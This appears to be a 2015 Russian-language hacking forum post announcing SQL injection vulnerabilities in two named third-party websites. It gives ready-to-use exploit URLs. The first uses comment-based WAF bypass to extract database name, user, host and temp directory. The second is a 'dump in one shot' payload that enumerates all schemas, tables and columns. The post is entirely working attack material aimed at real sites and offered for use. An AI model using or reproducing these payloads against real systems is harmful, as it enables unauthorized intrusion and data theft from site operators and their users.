
04.10.2015, 16:36
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
Сайт: endividado.com.br
Уязвимость: SQLi
Эксплоит (с обходом WAF):
Код:
http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,@@tmpdir,database/*!(*/),current_user,@@hostname,6,7+--+
UPD DIOS
Код:
http://www.cardigan.ltd.uk/exhibitions-index.php?id=11' /*!50000union*/ select 1,2,/*!50000concat*/((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@a)in (@a:=/*!50000concat*/(@a,0x3c6c693e,table_schema,0x203a3a20,table_name,0x203a3a20,column_name,0x3c62723e))))a)),4,5,6,7,8,9,10,11,12,13,14--+
|
|
|